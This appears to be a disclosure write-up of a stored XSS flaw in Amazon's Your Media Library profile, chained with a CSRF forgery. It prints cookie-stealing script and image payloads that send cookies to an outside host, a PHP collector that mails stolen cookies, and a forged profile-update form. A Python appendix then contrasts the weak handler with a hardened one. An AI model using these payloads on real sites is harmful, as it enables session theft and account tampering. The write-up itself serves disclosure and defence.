The Amazon Your Media Library is vulnerable to a stored XSS vulnerability: the attacker can redirect a user to his profile page and steal the user cookie to perform an
Your Media Library is a secure location from which you retrieve all digital products, including eDocs, Amazon Upgrades, the free electronic user manuals that come with some products, and free music files that are available with select CDs.
Insert this vector into the "In my own words" input:
Since many cookie values were set as HttpOnly, the malicious user cannot hijack the session directly, but he can still execute arbitrary operations through a CSRF attack by knowing the session-id saved in the user cookie (the session-id serves as the security token):
Generate a basic HTML payload to steal the user cookie:
<script> location.href='//land-domain.com/steal.php?cookie='+document.cookie; </script>
Or if you want a payload without redirect:
<img style='display:none' src=x onerror=this.src='//land-domain.com/?cookie='+document.cookie>
The attacker adds this double-encoded vector to his interests on the profile settings page:
Then he redirects the user to his Media Library profile page, and the cookie is stolen and stored by a remote malicious file (a basic steal.php):
$ echo " <?php mail('firstname.lastname@example.org', 'Cookie', $_GET['cookie']); header('Location: '.$_SERVER['HTTP_REFERER']); ?>" > /var/www/land-domain.com/steal.php
Now he has the user's 'session-id=180-0536506-4528302' (which is not secured).
With this simple CSRF page:
<html>
<head>
<title>Amazon CSRF</title>
</head>
<body>
<form method="POST" action="https://www.amazon.com/gp/ays/ajax/setProfile.html">
<input type="hidden" name="key" value="inMyOwnWords">
<input type="hidden" name="value" value="injected">
<input type="hidden" name="sessionId" value="180-0536506-4528302">
</form>
</body>
</html>
The malicious user can change all of the user's profile settings.
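The chain above relies on two server-side weaknesses: the session-id cookie is readable from script (not HttpOnly), and the same session-id is accepted as the anti-CSRF token on setProfile. The following is an added example, not code from the advisory or from Amazon, modelling a profile-update handler in its weak form beside a hardened one (a separate HMAC-derived token that script cannot obtain from document.cookie, plus output encoding of the stored "In my own words" text); the field names, the session-id value from the advisory and the cookie dictionaries are constructed for the demo, and the hardened variant assumes the session cookie is also set HttpOnly.

```python
import hashlib
import hmac
import html
import secrets

# Server-side key for deriving anti-CSRF tokens (constructed for this demo).
SERVER_KEY = secrets.token_bytes(32)

# Constructed cookies of a logged-in victim; the advisory's session-id is
# not HttpOnly, so a stored-XSS payload can read it via document.cookie.
VICTIM_COOKIES = {"session-id": "180-0536506-4528302"}

def set_profile_vulnerable(cookies, form, profile):
    """Weak check: the form's sessionId field doubles as the CSRF token,
    but it is just the script-readable session-id cookie value."""
    if form.get("sessionId") != cookies.get("session-id"):
        return False
    profile[form["key"]] = form["value"]   # stored exactly as submitted
    return True

def csrf_token_for(session_id):
    """Per-session token derived from a server secret and embedded only in
    the legitimate form; knowing the session-id does not reveal it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def set_profile_hardened(cookies, form, profile):
    """Requires the derived token and compares it in constant time."""
    sid = cookies.get("session-id")
    if sid is None:
        return False
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token_for(sid)):
        return False
    profile[form["key"]] = form["value"]
    return True

def render_field(value):
    """Output-encode profile text at render time, so stored markup (even a
    payload that was double-encoded on input) is displayed, not executed."""
    return html.escape(value, quote=True)

def demo():
    """Replays the advisory's forged form against both handlers."""
    profile = {}
    forged = {"key": "inMyOwnWords", "value": "injected",
              "sessionId": VICTIM_COOKIES["session-id"]}
    weak = set_profile_vulnerable(VICTIM_COOKIES, forged, profile)
    strong = set_profile_hardened(VICTIM_COOKIES, forged, profile)
    return weak, strong   # (True, False)
```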